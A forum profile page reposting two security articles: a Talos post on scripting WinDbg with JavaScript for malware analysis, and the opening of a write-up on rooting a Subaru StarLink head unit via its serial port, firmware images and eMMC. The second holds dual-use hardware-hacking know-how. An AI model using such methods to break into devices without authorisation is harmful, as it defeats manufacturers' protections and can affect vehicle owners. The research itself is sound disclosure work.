-
Posts
18785 -
Joined
-
Last visited
-
Days Won
738
Everything posted by Nytro
-
Monday, February 18, 2019 JavaScript bridge makes malware analysis with WinDbg easier Introduction As malware researchers, we spend several days a week debugging malware in order to learn more about it. We have several powerful and popular user mode tools to choose from, such as OllyDbg, x64dbg, IDA Pro and Immunity Debugger. All these debuggers utilize some scripting language to automate tasks, such as Python or proprietary languages like OllyScript. When it comes to analyzing in kernel mode, there is really one option: Windows debugging engine and its interfaces CDB, NTSD, KD and WinDbg. Unfortunately, even if WinDbg is the most user-friendly of the bunch, it is widely considered as one of the least user-friendly debuggers in the world. The learning curve for WinDbg commands is quite steep, as it combines an unintuitive and often conflicting command syntax with an outdated user interface. Adding the traditional WinDbg scripting language to this equation does not make things easier for the user as it creates an additional layer of complexity by introducing its own idiosyncrasies. Thankfully, there's a new WinDbg preview for Windows 10 that brings it in line with modern programming environments. This preview includes a new JavaScript engine and an exposed debugging data model through a set of JavaScript objects and functions. These new features bring WinDbg in line with modern programming environments such as Visual Studio, using already familiar elements of the user interface. In this post, we'll go over this new version of WinDbg's debugger data model and its new interface with JavaScript and dx commands. Debugger data model The debugger data model is an extensible object model that allows debugger extensions, as well as the WinDbg, user interface to access a number of internal debugger objects through a consistent interface. The objects relevant for malware analysis exposed through the data model are: Debugging sessions Processes Process environment (ex. Peb and Teb) Threads Modules Stack frames Handles Devices Code (disassembler) File system Debugger control Debugger variables Pseudo registers dx display expression All the above types of objects are exposed through a new command dx (display debugger object model expression), which can be used to access objects and evaluate expressions using a C++ like syntax, in a simpler and more consistent way than the one exposed through somewhat confusing mix of the MASM and the C++ expression evaluators. Thanks to the addition of the NatVis functionality to WinDbg, the results of dx command are displayed in a much more user friendly way using intuitive formatting with DML as a default output. The starting point for exploring the dx command is simply to type dx Debugger in the WinDbg command window, which will show the top level namespaces in the exposed data model. Those four namespaces are Sessions, Settings, State and Utility. DML generates output using hyperlinks, allowing the user to drill down into the individual namespaces simply by clicking on them. For example, by clicking on the Sessions hyperlink, the command dx -r1 Debugger.Sessions will be executed and its results displayed. Drilling down from the top-level namespaces to processes If we go a couple of layers further down, which can also be controlled with the -r dx command option, we will get to the list of all processes and their properties, including the _EPROCESS kernel object fields exposed as the member KernelObject of a Process debugger object. Users of earlier WinDbg versions will certainly appreciate the new ease of investigation available through the dx command. The dx command also supports tab completion, which makes navigating the data model even easier and allows the user to learn about the operating system and WinDbg internals such as debugger variables and pseudo-registers. For example, to iterate through the list of internal debugger variables you can type dx @$ and then repeatedly press the tab keyboard key, which will cycle through all defined pseudo-registers, starting from $argreg. Pseudo-registers and internal variables are useful if we want to avoid typing full object paths after the dx command. Instead of Debugger.Sessions[0] you can simply use the pseudo-register @$cursession, which points to the current session data model object. If you need to work with the current process you can simply type dx @$curprocess instead of the longer dx Debugger.Sessions[0].Process[procid]. Linq queries Linq (Language Integrated Query) is an already familiar concept for .NET software engineers that allows the user to create SQL-like queries over the object collections exposed through the dx command. There are two syntaxes available for creating Linq expressions for normal .NET development, but WinDbg, through the dx command, only supports creating queries using the Lambda expression syntax. Linq queries allow us to slice and dice the collection objects and extract the pieces of information we are interested in displaying. The Linq function "Where" allows us to select only those objects which satisfy a condition specified by the Lambda expression argument supplied as the function argument. For example, to display only processes which have the string "Google" in the name, we can type: dx @$cursession.Processes.Where(p => p.Name.Contains("Google")) Just like in SQL, the "Select" function allows us to choose which members of an object in the collection we would like to display. For example, for the processes we already filtered using the "Where" function, we can use "Select" to retrieve only the process name and its ID: dx -r2 @$cursession.Processes.Where(p => p.Name.Contains("Google")).Select(p => New { Name=p.Name, Id=p.Id }) Going one level deeper, into the exposed _EPROCESS kernel object, we can choose to display a subset of handles owned by the process under observation. For example, one of the methods to find processes hidden by a user mode rootkit is to enumerate process handles of the Windows client server subsystem process (csrss.exe) and compare that list with a list generated using a standard process enumeration command. Before we list processes created by csrss.exe, we need to find the csrss.exe process(es) objects and once we find them, switch into their context: dx @$cursession.Processes.Where(p => p.Name.Contains("csrss.exe"))[pid].SwitchTo() We can now run a Linq query to display the paths to the main module of the processes present in the csrss.exe handle table: dx @$curprocess.Io.Handles.Where(h => h.Type.Contains("Process")).Select(h => h.Object.UnderlyingObject.SeAuditProcessCreationInfo.ImageFileName->Name) Since ImageFileName is a pointer to a structure of the type _OBJECT_NAME_INFORMATION, we need to use the arrow to dereference it and access the "Name" fields containing the module path. There are many other useful Linq queries. For example, users can order the displayed results based on some criteria, which is similar to the Order By SQL clause, or count the results of the query using the "Count" function. Linq queries can also be used in the JavaScript extension, but their syntax is once again slightly different. We will show an example of using Linq within JavaScript later in the blog post. WinDbg and JavaScript Now that we've covered the basics of the debugger data model and the dx command to explore it, we can move on to the JavaScript extension for WinDbg. Jsprovider.dll is a native WinDbg extension allowing the user to script WinDbg and access the data model using a version of Microsoft's Chakra JavaScript engine. The extension is not loaded by default into the WinDbg process space — it must be done manually. This avoids potential clashes with other JavaScript-based extensions. Jsprovider is loaded using the standard command for loading extensions: .load jsprovider.dll While this post discusses conventional scripts a threat researcher may create while analysing a malware sample, it is worth mentioning that the JavaScript extension also allows developers to create WinDbg extensions that feel just as existing binary extensions. More information about creating JavaScript-based extensions can be found by investigating one of the extensions provided through the official GitHub repository of WinDbg JavaScript examples. WinDbg Preview contains a fully functional Integrated Development Environment (IDE) for writing JavaScript code, allowing the developer to refactor their code while debugging a live program or investigating a memory dump. The following WinDbg commands are used to load and run JavaScript based scripts. The good news is that the commands for handling JavaScript-based scripts are more intuitive compared to the awkward standard syntax for managing WinDbg scripts: .scriptload command loads a JavaScript script or an extension into WinDbg but it does not execute it. .scriptrun runs the loaded script. .scriptunload unloads the script from WinDbg and from the debugger data model namespace. .scriptlist lists all currently loaded scripts. JavaScript entry points Depending on the script command used to load the script, the JavaScript provider will call one of the predefined user script entry points or execute the code in the script root level. From the point of view of a threat researcher, there are two main entry points. The first is a kind of a script constructor function named initializeScript, called by the provider when the .scriptload command is executed. The function is usually called to initialize global variables, and define constants, structures and objects. The objects defined within the initializeScript function will be bridged into the debugger data model namespaces using the functions host.namespacePropertyParent and host.namedModelParent. The bridged objects can be investigated using the dx command as any other native object in the data model. The second, and even more important entry point is the function invokeScript, an equivalent of the C function main. This function is called when the user executes the .scriptrun WinDbg command. Useful tricks for JavaScript exploration Now we will assume that we have a script named "myutils.js" where we keep a set of functions we regularly use in our day-to-day research. First, we need to load the script using the .scriptload function. Loading script functions from the user's Desktop folder WinDbg JavaScript modules and namespaces The main JavaScript object we use to interact with the debugger is the host object. If we are using WinDbg Preview script editor, the Intellisense tab completion and function documentation feature will help us with learning the names of the available functions and members. IntelliSense in action If we just want to experiment, we can put our code into the invokeScript function which will get called every time we execute the script. Once we are happy with the code, we can refactor it and define our own set of functions. Before we dig deeper into the functionality exposed through the JavaScript interface, it is recommended to create two essential helper functions for displaying text on the screen and for interacting with the debugger using standard WinDbg commands. They will be helpful for interaction with the user and for creating workarounds around some functionality that is not yet natively present in JavaScript, but we would need it for debugging. In this example, we named these functions logme and exec. They are more or less just wrappers around the JavaScript functions with the added advantage that we don't need to type the full namespace hierarchy in order to reach them. Helper functions wrapping parts of the JavaScript WinDbg API In the function exec, we see that by referencing the host.namespace.Debugger namespace, we are able to access the same object hierarchy through JavaScript as we would with the dx command from the WinDbg command line. The ExecuteCommand function executes any of the known WinDbg commands and returns the result in a plain text format which we can parse to obtain the required results. This approach is not much different to the approach available in the popular Python based WinDbg extension pykd. However, the advantage of Jsprovider over pykd is that most of the JavaScript extension functions return JavaScript objects thatdo not require any additional parsing in order to be used for scripting. For example, we can iterate over a collection of process modules by accessing host.currentProcess.Modules iterable. Each member of the iterable array is an object of class Module and we can display its properties, in this case the name. It is worth noting that Intellisense is not always able to display all members of a JavaScript object and that is when the for-in loop statement can be very useful. This loop allows us to iterate through names of all the object members which we can print to help during exploration and development. Displaying the members of a Module object On the other hand, the for-of loop statement iterates through all members of an iterable object and returns their values. It is important to remember distinction between these two for loop forms. Printing list of modules loaded into the current process space We can also fetch a list of loaded modules by iterating through the Process Environment Block (PEB) linked list of loaded modules although this requires more preparation to convert the linked list into a collection by calling the JavaScript function host.namespace.Debugger.Utility.Collections.FromListEntry. Here is a full listing of a function which converts the linked list of loaded modules into a JavaScript array of modules and displays their properties. function ListProcessModulesPEB (){ //Iterate through a list of Loaded modules in PEB using FromListEntry utility function for (var entry of host.namespace.Debugger.Utility.Collections.FromListEntry(host.currentProcess.KernelObject.Peb.Ldr.InLoadOrderModuleList, "nt!_LIST_ENTRY", "Flink")) { //create a new typed object using a _LIST_ENTRY address and make it into _LDR_TABLE_ENTRY var loaderdata=host.createTypedObject(entry.address,"nt","_LDR_DATA_TABLE_ENTRY"); //print the module name and its virtual address logme("Module "+host.memory.readWideString(loaderdata.FullDllName.Buffer)+" at "+ loaderdata.DllBase.address.toString(16) + " Size: "+loaderdata.SizeOfImage.toString(16)); } } This function contains the code to read values from process memory, by accessing the host.memory namespace and calling one of the functions readMemoryValues, readString or readWideString, depending on the type of data we need to read. JavaScript 53-bit integer width limitation Although programming WinDbg using JavaScript is relatively simple compared to standard WinDbg scripts, we need to be aware of few facts that may cause a few headaches. The first is the fact that the width of JavaScript integers is limited to 53 bits, which may cause some issues when working with native, 64-bit values. For that reason, the JavaScript extension has a special class host.Int64 whose constructor needs to be called when we want to work with 64-bit numbers. Luckily, the interpreter will warn us when a 53-bit overflow can occur. A host.Int64 object has a number of functions that allow us to execute arithmetic and bitwise operations on it. When trying to create a function to iterate through an array of callbacks registered using the PspCreateProcessNotifyRoutine function shown later in the post, I was not able to find a way to apply a 64-bit wide And bitmask. The masking function seemed to revert back to the 53-bit width, which would create an overflow if the mask was wider than 53 bits. Masking a host.Int64 with a 53-bit And mask yields a correct result and incorrect if wider Luckily, there are functions GetLowPart and GetHighPart, which respectively return lower or upper 32 bits of a 64-bit integer. This allows us to apply the And mask we need and get back the required 64-bit value by shifting the higher 32-bit value to the left by 32 and adding the lower 32 bits to it. The 53-bit limitation for WinDbg JavaScript implementation is an annoyance and it would be very welcome if WinDbg team could find a way to overcome it and support 64 bit numbers without resorting to the special JavaScript class. Linq in JavaScript We have already seen how Linq queries can be used to access a subset of debugger data model objects and their members using the dx commands. However, their syntax in JavaScript is slightly different and it requires the user to supply either an expression that returns a required data type or supply an anonymous function as an argument to a Linq verb function call returning the required data type. For example, for the "Where" Linq clause, the returned value has to be a boolean type. For the "Select" clause, we need to supply a member of an object we would like to select or a new anonymous object composed of a subset of the queried object members. Here is a simple example using Linq functions filtering a list of modules to display only those modules whose name contains the string "dll" and selects only the module name and its base address to display. function ListProcessModules(){ //An example on how to use LINQ queries in JavaScript //Instead of a Lambda expression supply a function which returns a boolean for Where clause or let mods=host.currentProcess.Modules.Where(function (k) {return k.Name.includes("dll")}) //a new object with selected members of an object we are looking at (in this case a Module) .Select(function (k) {return { name: k.Name, adder:k.BaseAddress} }); for (var lk of mods) { logme(lk.name+" at "+lk.adder.toString(16)); } } Inspecting operating system structures A good starting point for getting the kernel functions and structures addresses is the function host.getModuleSymbolAddress.If we need the actual value stored in the retrieved symbol, we need to dereference the address using host.memory.readMemoryValues function or the dereference function for a single value. Here is an example enumerating callbacks registered using the documented PspCreateProcessNotifyRoutine kernel function that registers driver functions which will be notified every time a process is created or terminated. This is also used by kernel mode malware, for hiding processes or for preventing user mode modules of the malware from termination. The example in the post is inspired by the C code for enumerating callbacks implemented in the SwishDbgExt extension developed by Matthieu Suiche. This WinDbg extension is very useful for analysing systems infected by kernel mode malware, as well as kernel memory dumps. The code shows that even more complex functions can be relatively easily implemented using JavaScript. In fact, development using JavaScript is ideal for malware researchers as writing code, testing and analysis can be all be performed in parallel using the WinDbg Preview IDE. function ListProcessCreateCallbacks() { PspCreateNotifyRoutinePointer=host.getModuleSymbolAddress("ntkrnlmp","PspCreateProcessNotifyRoutine"); let PspCreateNotify=host.memory.readMemoryValues(PspCreateNotifyRoutinePointer,1,8); let PspCallbackCount=host.memory.readMemoryValues(host.getModuleSymbolAddress("ntkrnlmp","PspCreateProcessNotifyRoutineCount"),1,4); logme ("There are "+PspCallbackCount.toString()+" PspCreateProcessNotify callbacks"); for (let i = 0; i<PspCallbackCount;i++){ let CallbackRoutineBlock=host.memory.readMemoryValues(PspCreateNotifyRoutinePointer.add(i * 8),1,8); let CallbackRoutineBlock64=host.Int64(CallbackRoutineBlock[0]); //A workaround seems to be required here to bitwise mask the lowest 4 bits, //Here we have: //Get lower 32 bits of the address we need to mask and mask it to get //lower 32 bits of the pointer to the _EX_CALLBACK_ROUTINE_BLOCK (undocumented structure known in ReactOS) let LowCallback=host.Int64(CallbackRoutineBlock64.getLowPart()).bitwiseAnd(0xfffffff0); //Get upper 32 bits of the address we need to mask and shift it left to create a 64 bit value let HighCallback=host.Int64(CallbackRoutineBlock64.getHighPart()).bitwiseShiftLeft(32); //Add the two values to get the address of the i-th _EX_CALLBACK_ROUTINE_BLOCK let ExBlock=HighCallback.add(LowCallback); //finally jump over the first member of the structure (quadword) to read the address of the callback let Callback=host.memory.readMemoryValues(ExBlock.add(8),1,8); //use the .printf trick to resolve the symbol and print the callback let rez=host.namespace.Debugger.Utility.Control.ExecuteCommand(".printf \"%y\n\", " + Callback.toString()); //print the function name using the first line of the response of .printf command logme("Callback "+i+" at "+Callback.toString()+" is "+rez[0]); } } Here we see the manipulation of the 64-bit address mentioned above. We split a 64-bit value into upper and lower 32 bits and apply the bitmask separately to avoid a 53-bit JavaScript integer overflow. Another interesting point is the use of the standard debugger command .printf to do a reverse symbol resolution. Although the JavaScript function host.getModuleSymbolAddress allows us to get the address of the required symbol, as of writing this blog post there are no functions which allow us to get the symbol name from an address. That is why the workaround .printf is used with the %y format specifier which returns a string containing the name of the specified symbol. Debugging the debugging scripts Developers of scripts in any popular language know that for successful development, the developer also requires a set of tools that will allow debugging. The debugger needs to be able to set breakpoints and inspect values of variables and objects. This is also required when we are writing scripts that need to access various operating system structures or to analyse malware samples. Once again, the WinDbg JavaScript extension delivers the required functionality in the form of a debugging tool whose commands will be very familiar to all regular WinDbg users. The debugger is launched by executing the command .scriptdebug, which prepares the JavaScript debugger for debugging a specific script. Once the debugger has loaded the script, have an option to choose events which will cause the debugger to stop as well as set breakpoints on specific lines of script code. The command sxe within the JavaScript debugger is used, just as in WinDbg, to define after which events the debugger will break. For example, to break on the first executed line of a script we simply type sxe en. Once the command has successfully executed we can inspect the status of all available events by using the command sx. Sx shows JavaScript debugger breaking status for various exceptions Now, we also have an opportunity to specify the line of the script where the breakpoint should be set using the command bp, just as in standard WinDbg syntax. To set a breakpoint, the user needs to specify a line number together with the position on the line, for example bp 77:0. If the specified line position is 0, the debugger automatically sets the breakpoint on the first possible position on the line which helps us to avoid counting the required breakpoint positions. Setting a breakpoint on line position 0 sets it on the first possible position Now that we have set up all the required breakpoints we have to exit the debugger, which is a slightly unintuitive step. The debugging process continues after calling the script either by accessing the WinDbg variable @$scriptContents and calling any of the functions of the script we wish to debug or by launching the script using .scriptrun as usual. Naturally, the @$scriptContents variable is accessed using the dx command. Scripts can be launched for debugging using the @$scriptContents variable The debugger contains its own JavaScript evaluator command ??, which allows us to evaluate JavaScript expressions and inspect values of the script variables and objects. Commands ? or ?? are used to inspect display result of JavaScript expressions . JavaScript debugging is a powerful tool required for proper development. Although its function is already sufficient in early JavaScript extension versions, we hope that its function will become richer and more stable over time, as WinDbg Preview moves closer to its full release. Conclusion We hope that this post provided you with few pointers to functionality useful for malware analysis available through the official Microsoft JavaScript WinDbg extension. Although the API exposed through JavaScript is not complete, there are usually ways to work around the limitations by wrapping standard WinDbg commands and parsing their output. This solution is not ideal and we hope that new functionality will be added directly to the JavaScript provider to make the scripting experience even more user friendly. The Debugging Tools for Windows development team seems to be committed to adding new JavaScript modules as was recently demonstrated through the addition of the file system interaction and the Code namespace module which open a whole new set of possibilities for code analysis we may be able to cover in one of our next posts. Interested readers are invited to check out the CodeFlow JavaScript extension made available through the official examples repository on Github. If you would like to learn a few more tips on malware analysis using WinDbg and JavaScript Cisco Talos will be presenting a session at the CARO Workshop in Copenhagen in May. References dx command MASM and C++ WinDbg evaluators Linq and the debugger data model Debugger data model for reversers Debugging JavaScript in WinDbg JavaScript debugger example scripts WinDbg JavaScript scripting video DX command video Debugger object model video Posted by Vanja Svajcer at 12:29 PM Sursa: https://blog.talosintelligence.com/2019/02/windbg-malware-analysis-with-javascript.html#more
-
Jailbreaking Subaru StarLink Another year, another embedded platform. This exercise, while perhaps less important than the medical security research I've worked on the past, is a bit more practical and entertaining. What follows is a technical account of gaining persistent root code execution on a vehicle head unit. Table of Contents Jailbreaking Subaru StarLink Table of Contents Introduction Shared Head Unit Design Existing Efforts SSH Finding the Manufacturer Harman and QNX Dr. Charlie Miller & Chris Valasek's Paper First Recap Analysis of Attack Surfaces USB Update Mechanism On My Warranty Hardware Analysis Board Connectors Serial Port Installing the Update Firmware swdl.iso IFS Files ifs-subaru-gen3.raw Contents Files of Note minifs.ifs Contents ISO Modification Reverse Engineering QNXCNDFS installUpdate Flow cdqnx6fs Cluster Table Cluster Data Decrypting Key Generation Emulation Cluster Decryption Cluster Decompression Mounting the Image The Extents Section Understanding the Extents Final Decompression system.dat ifs_images Back to QNXCNDFS The Shadow File Non-privileged Code Execution Image Creation Root Escalation Backdooring SSH Putting it All Together CVE-2018-18203 Next Steps Notes from Subaru and Harman Note from Subaru Note from Harman Conclusion Introduction Back in June, I purchased a new car: the 2018 Subaru Crosstrek. This vehicle has an interesting head unit that's locked down and running a proprietary, non-Android operating system. Let's root it. If this was Android, we could most likely find plenty of pre-existing PoCs and gain root rather trivially as most vehicle manufacturers never seem to update Android. Because this isn't an old Android version, we'll have to put a little more work in than usual. Shared Head Unit Design In 2017, Subaru launched a new version of their StarLink head unit on the Impreza. The same head unit appears to be used on the 2018+ Crosstrek, as well as the latest Forester and Ascent. If we can root the base device, we can potentially root every head unit on every vehicle sharing the same platform. There are a few SKUs for the head units on the Crosstrek and Impreza. The cheapest model has a 6-inch screen. A higher trim model has an 8-inch screen, and the top of the line model has the 8-inch screen as well as an embedded GPS mapping system. All models support Apple Carplay and Android Auto. The 8-inch models can connect to WiFi networks and theoretically download firmware updates wirelessly, but this functionality doesn't seem to be in use yet. Existing Efforts Starting from scratch, we know virtually nothing about the head unit. There are no obvious debugging menus, no firmware versions listed anywhere, and no clear manufacturer. First, we need to research and find out if anyone else has already accomplished this or made any progress understanding the unit. The only useful data was posted by redditor nathank1989. See his post in /r/subaruimpreza, and, more importantly, the replies. To quote his post: SSH Into STARLINK Just got myself the 2017 Impreza Sport and can see there's an open SSH server. Kudos to the person who knows what is or how to find the root user and password. 2 hours of googling has yielded nothing. SSH is a good sign — we're mostly likely running some sort of Unix variant. Further down in the Reddit post, we have a link to a firmware update. This will save us time as getting access to a software update is sometimes quite difficult with embedded systems. Subaru later took this firmware update down. They had linked to it from the technical service manuals you can purchase access to through Subaru. It appears that Subarunet did not require any form of authentication to download files originally. I did not get the files from this link as they were down by the time I found the thread, but, the files themselves had been mirrored by many Subaru enthusiasts. These files can be placed on a USB thumb drive, inserted into the vehicle's USB ports, and the firmware installed on the head unit. Aside from this, there really isn't much information out there. SSH What happens if we connect to SSH over WiFi? ****************************** SUBARU ******************************* Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do. ********************************************************************* root@192.168.0.1's password: Dead end. Brute forcing is a waste of time and finding an exploit that would only work on the top tier of navigation models with WiFi isn't practical. Finding the Manufacturer We can find the manufacturer (Harman) in several different ways. I originally discovered it was Harman after I searched several auction sites for Subaru Impreza head units stripped out of wrecked vehicles. There were several for sale that had pictures showing stickers on the removed head unit with serial numbers, model numbers, and, most importantly, the fact that Harman manufacturers the device. Another way would be to remove the head unit from a vehicle, but I'm not wealthy enough to void the warranty on a car I enjoy, and I've never encountered a dash that comes out without tabs breaking. The technical manuals you can pay for most likely have this information as well as the head unit pinout. Hidden debug and dealer menus are accessible via key combinations. One of these menus hints that the device is running QNX and is from Harman. See another useful Reddit post by ar_ar_ar_ar. From the debug menu, we know we're running QNX 6.60. Harman and QNX Now that we know the manufacturer and OS, we can expand the search a bit. There are a few interesting publications on Harman head units, and one of them is both useful and relatively up-to-date. Dr. Charlie Miller & Chris Valasek's Paper Back in 2015, Dr. Charlie Miller and Chris Valasek presented their automotive research at Blackhat: Remote Exploitation of an Unaltered Passenger Vehicle. This is, by far, the best example of public research on Harman head units. Thank you to Dr. Miller and Chris for publishing far more details than necessary. The paper covers quite a few basics of Harman's QNX system and even shows the attacks they used to gain local code execution. Although the system has changed a bit since then, it is still similar in many ways and the paper is well worth reviewing. First Recap At this point, we know the following: This is a Harman device. It is running QNX 6.60. We have a firmware image. Analysis of Attack Surfaces Where do we begin? We can attack the following systems, listed by approximate difficulty, without having to disassemble the vehicle: Local USB Update Mechanism USB Media Playback (metadata decoding?) OBD? iPod Playback Protocol Carplay/Android Auto Interfaces CD/DVD Playback & Metadata Decoding Wireless WiFi Bluetooth FM Traffic Reception / Text Protocols There are more vectors, but attacking them often isn't practical at the hobbyist level. USB Update Mechanism The biggest attack vector (but not necessarily the most important) on a vehicle head unit is almost always the head unit software update mechanism. Attackers need a reliable way to gain access to the system to explore it for other vulnerabilities. Assuming it can be done, spoofing a firmware update is going to be a much more "global" rooting mechanism than any form of memory corruption or logic errors (barring silly mistakes like open Telnet ports/DBUS access/trivial peek/poke etc.). Thus, finding a flaw like this would be enormously valuable from a vulnerability research perspective. On My Warranty If we’re going to start attacking an embedded system, we probably shouldn’t attack the one in a real, live vehicle used to drive around town. More than likely nothing bad would happen assuming correct system design and architecture (a safe assumption?), but paying to have the dealer replace the unit would be very expensive. This could also potentially impact the warranty, which could be cost-prohibitive. Auction sites have plenty of these for sale from salvage yards for as low as $200. That's a fantastic deal for a highly proprietary system with an OEM cost of more than $500. Hardware Analysis Before we look at the firmware images we grabbed earlier, let's evaluate the hardware platform. This is pretty standard for embedded systems. First, figure out how to power on the system. We need a DC power supply for the Subaru head unit as well as the wiring diagram for the back of the unit in order to know what to attach the power leads to. I didn't feel like paying the $30 for access to the technical manual, so I searched auction sites for a while, eventually found a picture of the wiring harness, noted that the harness had one wire that was much thicker than the others, guessed that was probably power, attached the leads, prayed, and powered the unit on. I don't recommend doing that, but it worked this time. Next, disassemble the device and inventory the chips on the system. Important parts: ARM processors. USB ports. (correspond to the USB ports in the car for iPhone attachment etc) Unpopulated orange connectors. (Interesting!) 32GB eMMC. The eMMC is a notable attack vector. If we had unlimited time and money, dump the contents via attaching test points to nearby leads else by desoldering the entire package. Unfortunately, I don't have the equipment for this. At minimum I'd want a rather expensive stereo microscope, and that isn't worth the cost to me. One could potentially root the device by desoldering, dumping, modifying a shadow file, reflashing, and resoldering. A skilled technician (i.e. professional attacker) in a well-equipped lab could do this trivially. Board Connectors There are strange looking orange connectors with Kapton tape covering them. How do we find the connectors so we can easily probe the pins? We could trawl through tiny, black and white DigiKey pictures for a while and hopefully get lucky, but asking electronics.stackexchange.com is far simpler. I posted the question and had many members helpfully identify the connector as Micromatch in less than an hour. Fantastic. Order cable assemblies from DigiKey, attach them, then find the 9600 or 115200 baud serial port every embedded system under the sun always has. Always. Serial Port SUBARU Base, date:Jul 11 2017 Using eMMC Boot Area loader in 79 ms �board_rev = 6 Startup: time between timer readings (decimal): 39378 useconds Welcome to QNX 660 on Harman imx6s Subaru Gen3 ARM Cortex-A9 MPCore login: RVC:tw9990_fast_init: Triggered TW9990 HW Reset RVC:tw9990_fast_init: /dev/i2c4 is ready WFDpixel_clock_kHz: 29760 WFDhpixels: 800 WFDhfp: 16 WFDhsw: 3 WFDhbp: 45 WFDvlines: 480 WFDvfp: 5 WFDvsw: 3 WFDvbp: 20 WFDflags: 2 RVC:tw9990_fast_init: Decoder fast init completed [Interrupt] Attached irqLine 41 with id 20. [Interrupt] Attached irqLine 42 with id 21. root root Password: Login incorrect Serial has a username and password. A good guess is that it's using the exact same credentials as the SSH server. Another dead end. At this point I tried breaking into some form of bootloader on boot via keystrokes and grounding various chips, but no luck. There are other pins, so we could look for JTAG, but since we have a firmware update package, let's investigate that first. JTAG would involve spending more money, and part-time embedded security research isn't exactly the most lucrative career choice. Installing the Update To install the update, we first need to solder on a USB socket so we can insert a flash drive into the test setup. Subaru seems to sell these cables officially for around 60$. The cheaper way is to splice a USB extension cord and solder the four leads directly to the board. After doing this step, the system accepts the downloaded update. The device I purchased from a salvage yard actually had a newer firmware version than the files I got from various Subaru forums. The good news is that the system supports downgrading and does not appear to reject older firmwares. It also happily reinstalls the same firmware version on top of itself. Now onto the firmware analysis stage. Firmware Here's what the update package has: BASE-2017MY Impreza Harman Audio Update 06-2017/update/KaliSWDL$ ls -lash total 357M 0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 . 0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 .. 4.0K -rwxrwxrwx 1 work work 1.8K Jun 7 2017 checkswdl.bat 44K -rwxrwxrwx 1 work work 43K Jun 7 2017 KaliSWDL.log 784K -rwxrwxrwx 1 work work 782K Jun 7 2017 md5deep.exe 167M -rwxrwxrwx 1 work work 167M Jun 7 2017 swdl.iso 0 -rwxrwxrwx 1 work work 48 Jun 7 2017 swdl.iso.md5 86M -rwxrwxrwx 1 work work 86M Jun 7 2017 swupdate.dat 104M -rwxrwxrwx 1 work work 104M Jun 7 2017 system.dat checkswdl.bat - Checks the md5sum of swdl.iso and compares it with swdl.iso.md5. Prints a nice pirate ship thumbs-up on a successful verification, else a pirate flag on failure. _@_ ((@)) ((@)) ((@)) ______===(((@@@@====) ##########@@@@@=====)) ##########@@@@@----)) ###########@@@@----) ========----------- !!! FILE IS GOOD !!!! At first, I thought the only signature checking on the update was a md5 sum we could modify in the update folder. Thankfully, that assumption was incorrect. KaliSWDL.log - Build log file. This doesn't look like it needs to be included with the update package. My guess is that it is just a build artifact Harman didn't clean up. VARIANT : NAFTA LOGFILE : F:\Perforce\Jenkins\Slave\workspace\Subaru_Gen3_Release_Gen3.0\project\build\images\KaliSWDL\KaliSWDL.log MODELYEAR : MY2017 BUILD VERSION : Rel2.17.22.20 BUILD YEAR : 17 BUILD WEEK : 22 BUILD PATCH : 20 BUILD TYP : 1 BUILD BRANCH : Rel BUILD VP : Base The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. - BuildType - 1 - Build Branch - Rel - Build Version Year - 17 - Build version Week - 22 - Build Version Patch - 20 - Model Year - MY2017 - Market - NA - Market - NA - VP - Base - Salt - 10 swdl.iso - ISO file containing lots of firmware related files. Guessing the ISO format was left over from older Harman systems where firmware updates were burned onto CDs. dat files - swupdate.dat and system.dat are high entropy files with no strings. Almost certainly encrypted. Only useful piece of information in the file is "QNXCNDFS" right at the beginning. Search engines, at the time I first looked at this, had no results for this filetype. My guess was that it was custom to Harman and/or QNX. $ hexdump -Cv -n 96 swupdate.dat 00000000 51 4e 58 43 4e 44 46 53 01 03 01 00 03 00 00 00 |QNXCNDFS........| 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 00000020 00 a4 07 0c 00 00 00 00 00 02 00 00 00 00 00 00 |................| 00000030 80 02 00 00 00 00 00 00 90 0e 00 00 00 00 00 00 |................| 00000040 04 00 00 00 00 00 00 00 c1 00 00 00 00 00 00 00 |................| 00000050 00 00 10 00 00 80 10 00 04 00 00 00 04 00 00 00 |................| As the dat files look encrypted, starting with the ISO file makes the most sense. swdl.iso The ISO contains many files. More build artifacts with logs from the build server, what look like bootloader binary blobs, several QNX binaries with full debug symbols we can disassemble, one installation shell-script and, most importantly, IFS files. $ file softwareUpdate softwareUpdate: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /usr/lib/ldqnx.so.2, BuildID[md5/uuid]=381e70a72b349702a93b06c3f60aebc3, not stripped IFS Files QNX describes IFS as: An OS image is simply a file that contains the OS, plus any executables, OS modules, and data files that are needed to get the system running properly. This image is presented in an image filesystem (IFS). Thus, IFS is a binary format used by QNX. The only other important information to note here is that we can extract them with tools available on github. See dumpifs. ifs-subaru-gen3.raw Contents Running dumpifs on ifs-subaru-gen3.raw gets us this: Decompressed 1575742 bytes-> 3305252 bytes Offset Size Name 0 8 *.boot 8 100 Startup-header flags1=0x9 flags2=0 paddr_bias=0 108 52008 startup.* 52110 5c Image-header mountpoint=/ 5216c 1994 Image-directory ---- ---- Root-dirent 54000 8e000 proc/boot/procnto-instr e2000 16f4 proc/boot/.script e4000 521 bin/.kshrc e5000 2e6 bin/boot.sh e6000 10d bin/mountMMC0.sh e7000 63 bin/umountMMC0.sh e8000 6b bin/mountUSB.sh e9000 2b9 bin/mountUSBUpdate.sh ea000 6d6 bin/startUpdate.sh Lots of base operating system files. We can extract most of them via dumpifs -bx ifs-subaru-gen3.raw. $ ls authorized_keys ftpd.conf libtracelog.so.1 shadow banner ftpusers ln slay Base.pub getconf login sleep boot.sh gpio.conf lsm-pf-v6.so slogger2 cam-disk.so group mount spi-master cat hosts mount_ifs spi-mx51ecspi.so checkForUpdate.sh i2c-imx mountMMC0.sh sshd_config cp ifs-subaru-gen3.raw mountUSB.sh ssh_host_dsa_key devb-sdmmc-mx6_generic img.conf mountUSBUpdate.sh ssh_host_key devc-pty inetd.conf mv ssh_host_rsa_key devc-sermx1 init.sh NAFTA.pub startNetwork.sh dev-ipc io passwd startRvc.sh dev-memory io-blk.so pf.conf startUpdate.sh dev-mmap ipl-subaru-gen3.bin pf.os SubaruPubkey.pmem earlyStartup.sh ksh pipe symm.key echo libcam.so.2 prepareEMMCBootArea.sh sync eMMCFactoryFormat.sh libc.so.3 procnto-instr touch eMMCFormat.sh libdma-sdma-imx6x.so.1 profile 